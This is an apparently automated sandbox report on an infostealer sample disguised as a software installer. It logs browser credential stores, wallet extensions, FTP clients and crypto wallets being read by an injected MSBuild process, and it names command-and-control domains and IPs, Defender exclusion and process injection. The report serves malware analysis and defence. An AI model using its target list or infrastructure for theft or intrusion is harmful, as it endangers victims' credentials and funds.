Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		11
Disable or Modify Tools		2
OS Credential Dumping		1
System Time Discovery		Remote Services1
Archive Collected Data		3
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts411
Process Injection		1
Deobfuscate/Decode Files or Information		LSASS Memory11
File and Directory Discovery		Remote Desktop Protocol41
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)3
Obfuscated Files or Information		Security Account Manager43
System Information Discovery		SMB/Windows Admin Shares1
Screen Capture		11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS261
Security Software Discovery		Distributed Component Object Model2
Clipboard Data		4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Process Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
Masquerading		Cached Domain Credentials251
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
Process Injection		Proc Filesystem1
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638808 Sample: Software Installer.exe Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 37 trumpsscamer2009.top 2->37 39 ip-api.com 2->39 41 4 other IPs or domains 2->41 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 2->57 59 9 other signatures 2->59 8 Software Installer.exe 14 2->8         started        signatures3 process4 dnsIp5 47 ip-api.com 208.95.112.1, 49711, 49719, 80 TUT-ASUS United States 8->47 49 83.217.208.69, 49714, 49727, 5000 INF-NET-ASRU Russian Federation 8->49 51 api.ipify.org 104.26.13.205, 49710, 49713, 49717 CLOUDFLARENETUS United States 8->51 35 C:\Users\user\Microsoft_Driver_vs_2019.exe, PE32+ 8->35 dropped 69 Found many strings related to Crypto-Wallets (likely being stolen) 8->69 71 Adds a directory exclusion to Windows Defender 8->71 13 Microsoft_Driver_vs_2019.exe 1 8->13         started        16 powershell.exe 22 8->16         started        18 powershell.exe 8->18         started        20 powershell.exe 14 15 8->20         started        file6 signatures7 process8 dnsIp9 73 Contains functionality to inject code into remote processes 13->73 75 Writes to foreign memory regions 13->75 77 Allocates memory in foreign processes 13->77 79 Injects a PE file into a foreign processes 13->79 23 MSBuild.exe 13->23         started        27 conhost.exe 13->27         started        81 Loading BitLocker PowerShell Module 16->81 29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        43 trumpsscamer2009.top 172.67.159.94, 443, 49709, 49720 CLOUDFLARENETUS United States 20->43 33 conhost.exe 20->33         started        signatures10 process11 dnsIp12 45 citydisco.bet 188.114.97.3, 443, 49725, 49729 CLOUDFLARENETUS European Union 23->45 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->61 63 Query firmware table information (likely to detect VMs) 23->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 23->65 67 3 other signatures 23->67 signatures13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.